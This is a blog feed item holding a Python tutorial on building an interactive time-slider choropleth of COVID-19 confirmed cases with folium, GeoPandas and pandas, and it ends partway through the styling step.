&lt;/p&gt;</description></item><item><title>Mapping the Spread of COVID-19 with Python</title><link>https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/</link><pubDate>Thu, 26 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The purpose of this post isn&amp;rsquo;t to add new insight into the spread of the coronavirus - there are plenty of experts out there more qualified. Instead, our goal is to highlight how to construct simple, interactive visualisations using live data such as:&lt;/p&gt;
&lt;iframe title="My embedded document" width="100%" height="500" src="TimeSliderChoropleth2.html"&gt;&lt;/iframe&gt;
&lt;h2 id="getting-the-tools"&gt;Getting the tools&lt;/h2&gt;
&lt;p&gt;Folium is a Python library that allows you to create different types of interactive &lt;a href="https://leafletjs.com/" rel="external"&gt;Leaflet&lt;/a&gt; maps. Here, we are using the &lt;a href="https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset#covid_19_data.csv" rel="external"&gt;Novel Corona Virus 2019 Dataset&lt;/a&gt; to demonstrate how to make a choropleth (map) with a timeslider.&lt;/p&gt;
&lt;p&gt;We will be using the following libraries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://python-visualization.github.io/branca/colormap.html" rel="external"&gt;branca.colormap&lt;/a&gt;, a utility module for dealing with colourmaps&lt;/li&gt;
&lt;li&gt;&lt;a href="https://python-visualization.github.io/folium/" rel="external"&gt;folium&lt;/a&gt;, a tool to visualize Python data on an interactive Leaflet map&lt;/li&gt;
&lt;li&gt;&lt;a href="https://geopandas.org/" rel="external"&gt;GeoPandas&lt;/a&gt;, an open source project to make working with geospatial data in Python easier&lt;/li&gt;
&lt;li&gt;&lt;a href="https://numpy.org/" rel="external"&gt;NumPy&lt;/a&gt;, the fundamental package for scientific computing with Python&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/" rel="external"&gt;pandas&lt;/a&gt;, a fast, powerful, flexible and easy to use data analysis and manipulation tool&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;branca.colormap&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;cm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;folium&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;geopandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gpd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="preparing-the-data"&gt;Preparing the data&lt;/h2&gt;
&lt;p&gt;I’ve stored all my data in a directory called “python”. Using the &lt;strong&gt;pandas&lt;/strong&gt; library, we can read in the data via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#34;python/covid_19_data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SNo&lt;/th&gt;
&lt;th&gt;ObservationDate&lt;/th&gt;
&lt;th&gt;Province/State&lt;/th&gt;
&lt;th&gt;Country/Region&lt;/th&gt;
&lt;th&gt;Last Update&lt;/th&gt;
&lt;th&gt;Confirmed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Anhui&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Beijing&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Chongqing&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Fujian&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Gansu&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Guangdong&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;26&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;In order to map our data, we need a shapefile. A shapefile is a geospatial vector data format. The shapefile format can spatially describe vector features such as points, lines, and polygons. In our case, countries are represented as polygons. GeoPandas provides an inbuilt dataset of country shapes (&lt;code&gt;'naturalearth_lowres'&lt;/code&gt;), however this is missing some of the smaller countries that we require, such as Andorra. You can download the shapefiles that we used from &lt;a href="https://hub.arcgis.com/datasets/a21fdb46d23e4ef896f31475217cbb08_1" rel="external"&gt;here&lt;/a&gt;. We can read this file using GeoPandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; gpd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_file(&lt;span style="color:#a5d6ff"&gt;&amp;#39;python/Countries_WGS84.shp&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;countries&lt;/code&gt; object looks very similar to a standard &lt;strong&gt;pandas&lt;/strong&gt; DataFrame. The only addition is a &lt;code&gt;geometry&lt;/code&gt; column containing (you guessed it) spatial information for that row. For Aruba, for example, we have a polygon made up of several longitude-latitude pairs.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;X&lt;/th&gt;
&lt;th&gt;OBJECTID&lt;/th&gt;
&lt;th&gt;CNTRY_NAME&lt;/th&gt;
&lt;th&gt;geometry&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Aruba&lt;/td&gt;
&lt;td&gt;POLYGON ((-69.8822326660156 12.4111099243165, -69.9469451904296 12.4366655349731, -70.0590362548828 12.5402078628541, -70.0596618652343 12.6277761459352, -70.0331954956055 12.6183319091797, -69.93223571777339 12.5280551910401, -69.89695739746089 12.4808330535889, -69.8914031982421 12.4722213745117, -69.88555908203131 12.4577770233155, -69.87486267089839 12.4152765274048, -69.8822326660156 12.4111099243165))&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
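&lt;p&gt;To make the &lt;code&gt;geometry&lt;/code&gt; column a little more concrete, here is a minimal sketch in plain Python rather than GeoPandas. It uses a handful of the Aruba coordinates from the table (abridged and rounded, so this is not the real outline) and checks two simple properties of the ring. The names &lt;code&gt;aruba_ring&lt;/code&gt;, &lt;code&gt;is_closed&lt;/code&gt; and &lt;code&gt;bounding_box&lt;/code&gt; are made up for illustration and are not part of any library.&lt;/p&gt;

```python
# Abridged ring: a few (longitude, latitude) pairs taken from the Aruba polygon,
# rounded to four decimal places for readability. Not the full outline.
aruba_ring = [
    (-69.8822, 12.4111),
    (-70.0590, 12.5402),
    (-70.0597, 12.6278),
    (-69.8970, 12.4808),
    (-69.8822, 12.4111),  # same as the first pair, which closes the ring
]


def is_closed(ring):
    """A polygon ring is closed when its first and last points coincide."""
    return ring[0] == ring[-1]


def bounding_box(ring):
    """Return (min_lon, min_lat, max_lon, max_lat) for a list of (lon, lat) pairs."""
    lons = [lon for lon, _ in ring]
    lats = [lat for _, lat in ring]
    return min(lons), min(lats), max(lons), max(lats)


print(is_closed(aruba_ring))
print(bounding_box(aruba_ring))
```

&lt;p&gt;Note that the first and last pairs are identical: that is how a polygon ring is closed.&lt;/p&gt;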
&lt;p&gt;To be able to join the shapefile and the coronavirus data, we need to edit some of the information in both files. Unfortunately, this is a rather manual process. First, we need to make sure that the country names match between the data and the shapefiles:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; :
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dict&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fromkeys([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Taiwan&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Mainland China&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hong Kong&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Macau&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;China&amp;#39;&lt;/span&gt;)})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;US&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United States&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;UK&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United Kingdom&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;North Ireland&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United Kingdom&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Republic of Ireland&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Ireland&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Vatican City&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Italy&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Byelarus&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Belarus&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;Macedonia&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;North Macedonia&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We also need to make sure that the country column has the same name in both files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; countries&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#39;CNTRY_NAME&amp;#39;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some rows in the data record zero confirmed cases. We remove these, which also avoids taking the log of zero later on:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df[corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Confirmed &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then sort our data by country and observation date, and reset the index:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sorted_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index(drop&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Some countries, such as China, are split into different provinces/states. Since we just want the total number of cases per country, we get the sum for each country at each date:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sum_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sorted_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;], as_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can join the data and the shapefile together:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sum_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;merge(countries, on&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are going to plot the log (base 10) of the number of confirmed cases for each country, as a couple of countries, such as China and Italy, have far more cases than the rest.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;log10(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Confirmed&amp;#39;&lt;/span&gt;])
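&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We also need to convert the ObservationDate to Unix time in seconds. The integer representation of the datetime is in nanoseconds, so we divide by &lt;code&gt;10**9&lt;/code&gt;:&lt;/p&gt;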
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_datetime(joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;ObservationDate&amp;#39;&lt;/span&gt;])&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(int) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;**&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[&lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(int)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;astype(str)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now select the columns needed for the map and discard the others:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined_df[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;date_sec&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;log_Confirmed&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;geometry&amp;#39;&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="time-to-map"&gt;Time to map&lt;/h2&gt;
&lt;p&gt;A choropleth is a type of map where regions are shaded or patterned proportionally to a data variable. We are going to make a choropleth with a timeslider, to show the spread of COVID-19 over time. The &lt;code&gt;TimeSliderChoropleth&lt;/code&gt; class needs at least two arguments: a GeoJSON file containing the features (in this case, the countries) and a style dictionary. The style dictionary should have the following form:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;styledict &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    feature_id_0: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        timestamp_0: {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: colour, &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: opacity},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        timestamp_1: {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: colour, &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: opacity},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    feature_id_n: {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        timestamp_0: {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: colour, &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: opacity},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        timestamp_1: {&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;: colour, &lt;span style="color:#a5d6ff"&gt;&amp;#39;opacity&amp;#39;&lt;/span&gt;: opacity},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72;font-weight:bold"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this case, the keys are feature (country) ids. So for each country, we have a dictionary where the timestamps are the keys and the values are the colour and opacity of the country at that time.&lt;/p&gt;
